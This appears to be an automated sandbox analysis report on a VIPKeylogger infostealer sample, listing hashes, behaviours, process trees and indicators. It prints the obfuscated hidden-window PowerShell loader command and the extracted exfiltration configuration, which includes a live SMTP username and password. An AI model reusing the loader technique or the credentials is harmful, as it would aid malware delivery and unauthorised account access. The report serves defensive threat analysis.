Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/10/2024, 15:05
Static task
static1
Behavioral task
behavioral1
Sample
rJustificantedepago.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
rJustificantedepago.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Variabelforklaringen.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Variabelforklaringen.ps1
Resource
win10v2004-20241007-en
General
-
Target
rJustificantedepago.exe
-
Size
738KB
-
MD5
884358a9e9da158f576b7b7e42521d70
-
SHA1
a9d488b27fc2d65df89c1049c9cdf380e37e435f
-
SHA256
7821d35c1866a3ecd43b15d6a171fd9f11d70907105cc27f6b7f0760ca86bccd
-
SHA512
630c905e255424dc8e54a8b945aaa5673e6ff25fe4e2f9713b73a3f5a622ff8f5d33bfc06ccecd85e5017bac27e31007c878acba32af509000a6c51fdaea0216
-
SSDEEP
12288:javPpBdFOdWbKSYQNGHkROyGOs61IYZVAecgs9FMa1Mdq8jJN:javzLDK+NjDGMIYO7MoON
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
Escaragol?24 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3560 powershell.exe 872 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 13 IoCs
flow pid Process 20 1568 msiexec.exe 21 2284 msiexec.exe 26 2284 msiexec.exe 27 1568 msiexec.exe 30 1568 msiexec.exe 31 2284 msiexec.exe 33 1568 msiexec.exe 34 2284 msiexec.exe 40 1568 msiexec.exe 41 2284 msiexec.exe 47 1568 msiexec.exe 56 1568 msiexec.exe 66 1568 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 19 drive.google.com 20 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1568 msiexec.exe 2284 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3560 powershell.exe 872 powershell.exe 2284 msiexec.exe 1568 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\Grubstaking.bro rJustificantedepago.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1888 2284 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rJustificantedepago.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 3560 powershell.exe 872 powershell.exe 872 powershell.exe 3560 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 872 powershell.exe 3560 powershell.exe 1568 msiexec.exe 1568 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3560 powershell.exe 872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeIncreaseQuotaPrivilege 872 powershell.exe Token: SeSecurityPrivilege 872 powershell.exe Token: SeTakeOwnershipPrivilege 872 powershell.exe Token: SeLoadDriverPrivilege 872 powershell.exe Token: SeSystemProfilePrivilege 872 powershell.exe Token: SeSystemtimePrivilege 872 powershell.exe Token: SeProfSingleProcessPrivilege 872 powershell.exe Token: SeIncBasePriorityPrivilege 872 powershell.exe Token: SeCreatePagefilePrivilege 872 powershell.exe Token: SeBackupPrivilege 872 powershell.exe Token: SeRestorePrivilege 872 powershell.exe Token: SeShutdownPrivilege 872 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeSystemEnvironmentPrivilege 872 powershell.exe Token: SeRemoteShutdownPrivilege 872 powershell.exe Token: SeUndockPrivilege 872 powershell.exe Token: SeManageVolumePrivilege 872 powershell.exe Token: 33 872 powershell.exe Token: 34 872 powershell.exe Token: 35 872 powershell.exe Token: 36 872 powershell.exe Token: SeIncreaseQuotaPrivilege 3560 powershell.exe Token: SeSecurityPrivilege 3560 powershell.exe Token: SeTakeOwnershipPrivilege 3560 powershell.exe Token: SeLoadDriverPrivilege 3560 powershell.exe Token: SeSystemProfilePrivilege 3560 powershell.exe Token: SeSystemtimePrivilege 3560 powershell.exe Token: SeProfSingleProcessPrivilege 3560 powershell.exe Token: SeIncBasePriorityPrivilege 3560 powershell.exe Token: SeCreatePagefilePrivilege 3560 powershell.exe Token: SeBackupPrivilege 3560 powershell.exe Token: SeRestorePrivilege 3560 powershell.exe Token: SeShutdownPrivilege 3560 powershell.exe Token: SeDebugPrivilege 3560 powershell.exe Token: SeSystemEnvironmentPrivilege 3560 powershell.exe Token: SeRemoteShutdownPrivilege 3560 powershell.exe Token: SeUndockPrivilege 3560 powershell.exe Token: SeManageVolumePrivilege 3560 powershell.exe Token: 33 3560 powershell.exe Token: 34 3560 powershell.exe Token: 35 3560 powershell.exe Token: 36 3560 powershell.exe Token: SeDebugPrivilege 1568 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3000 wrote to memory of 872 3000 rJustificantedepago.exe 86 PID 3000 wrote to memory of 872 3000 rJustificantedepago.exe 86 PID 3000 wrote to memory of 872 3000 rJustificantedepago.exe 86 PID 3000 wrote to memory of 3560 3000 rJustificantedepago.exe 88 PID 3000 wrote to memory of 3560 3000 rJustificantedepago.exe 88 PID 3000 wrote to memory of 3560 3000 rJustificantedepago.exe 88 PID 3560 wrote to memory of 2284 3560 powershell.exe 96 PID 3560 wrote to memory of 2284 3560 powershell.exe 96 PID 3560 wrote to memory of 2284 3560 powershell.exe 96 PID 3560 wrote to memory of 2284 3560 powershell.exe 96 PID 872 wrote to memory of 1568 872 powershell.exe 97 PID 872 wrote to memory of 1568 872 powershell.exe 97 PID 872 wrote to memory of 1568 872 powershell.exe 97 PID 872 wrote to memory of 1568 872 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\rJustificantedepago.exe"C:\Users\Admin\AppData\Local\Temp\rJustificantedepago.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1568
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$supportable=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Variabelforklaringen.Adi';$Svinehundens=$supportable.SubString(52555,3);.$Svinehundens($supportable)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20204⤵
- Program crash
PID:1888
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2284 -ip 22841⤵PID:4936
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5a6c8d80c2d3beed73d7a189ff348a21b
SHA13865b28f472424e6f1ef7b19223b7b31d61a61d3
SHA2567487c912cea83b26dfdb258eb267aff87552b9b560e4c3883af9fafabf139347
SHA5125c662dc95647aa700adea7597c8e3c6e383fdfaca49ad3baf7e52d0c9d11f57e5f244641e8bdf4fd8f5a10ea1c37c80f637f54e4de4fe3510c87fe96cb752205
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD
Filesize471B
MD530b8219664afbb8d78a27969e8755ca1
SHA131e8ce9f55ef615280b21beb3eb5fb2f823f41df
SHA25691324c7e829db20de8d55d5a425c5ac46c5551023221d4e36e2b61218f30815a
SHA5125eb0d0d99460e54f69581cf35c20841efdabe17255d12b03e9f460dff723e8f2980b166fa9b71b6042034aa6b6fd2d7a70536dd1176bb13fb5981bcae14d4f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4
Filesize472B
MD5a1f013adb9ec5f40524a6635540e628f
SHA176ed661478849d5bbe5c847d1e05f81becdd67dd
SHA256450676438e2163fea2e341a9756355502bc35acc46efc68264578dfa76b30ab2
SHA5129426895082573c3f5cf12b20b27f1733c64e9fe69757394e49f7491509a0b397c5bdf07bd0ae6ac8821640c7759ebe17725a8f507eb878fff7750c3c0b557c27
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD5f00b1c76b3ffcc6276db7b1c5454eb2b
SHA110998edea35c148ef9b1a55ab4e00efac879385e
SHA256d69b0f7cd489a1f350600c386b38b8010b1d5203b9ffd2a47d0331fbba46bb09
SHA5120844c55a425837167f2bcb639234ede192a5151b1ef06f74352591e8fb7ff1263203b55e563f9f39562de5e9eea0045426166a062f3e3912a837748dba6c3ba7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD598450fc6fe656d4bed02546acd15f9fd
SHA1421832089fc33009e5be070584d1fccbf5226e5b
SHA256039989aa2773b160b9954bb9d54341bc74d5ec90c1ec644410b1bfc853b9f8c5
SHA512c6ad91d60c1767546cf0d21616c32c29fa67e241707f8ab42465c297d1ab1677865ba7edeaf3b63cdf271821bae192d140934746e05d492caafc641a30744518
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5130a566120ad365b05c71bd8daac3ce3
SHA13723f5933b7efce09f73e646ecb91e1b5997ef99
SHA2565e98dd794ee97277c58f858ffe7a43b1b0b19cc0c95990f91afe1e732df3bba4
SHA512e251679f91a46241f0523f62206419ba61fe3447bd3c47e3c882dfdb8c595b9b14af8f1923bb6f4d21d61d913268b4829637ed753d17cc4ee63c7491a09964e3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD
Filesize402B
MD57309abb59d7d1de4cec26d37ebdc12fb
SHA1abaee0b58d08a4831cfca730c347342b1927449a
SHA256589e6b9fa99ae9f717c223797305139c116c118ef64fc9555fe669e5196a0ea3
SHA512763a7501f867d017bde35533e0930d48e7dd721684039ce6a2ce0cd1e56858ee7e9c7062fb5e73c00eda04038d5d35da73fffbb08cb79d107eddfff6bceff2c5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4
Filesize398B
MD5a63bfcc41922c3a096da8ae4234c2de8
SHA1221482b2b8817782eaaff4a71079b04ec6fc1874
SHA256d13ea0c300b76bfd39585b55901be2d61a0d6b91fe6856dc315f21f903412735
SHA5129f9aaee9d4bf60d255787394a45557df5f37d4fd63be368717c047010555d101558d820675db8c82561dafd065302943c53fac5e0893d24f2db382fcced764fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
51KB
MD5b38fc73651b54a201ea1815e9fbdb7e1
SHA111dcb7973511a7f58eacd0c6b519d4c57b843ece
SHA2563cd2de55689d75d77cd308184060364fcf48b990e025e918233e528a3373a27b
SHA5120e6055ab2c490f2c67184e3dea070f6b0d9cd0e557e1c51d792da53c4674d844d8d5c9a5dd036261437db2bb7b8b8e0425168ac143da01b2b1ce116540989b1d
-
Filesize
293KB
MD5b334b379bb91d8c85290f62fd3a73c61
SHA184463e42d1eb3bd86807dc9f7e8d988ed63e07f8
SHA256d01bd6f6fe065a0c2fb2835355a216ff0062ab802ed9da33d56ecea72f5aa444
SHA51202d2d0a0579158c415f5b43dc104883cee88bfd7f77a70185d15c45219bff2148afec80d0d7150d301ca1e65637159b75b646af98a88e2e0b9a45567cbde04bc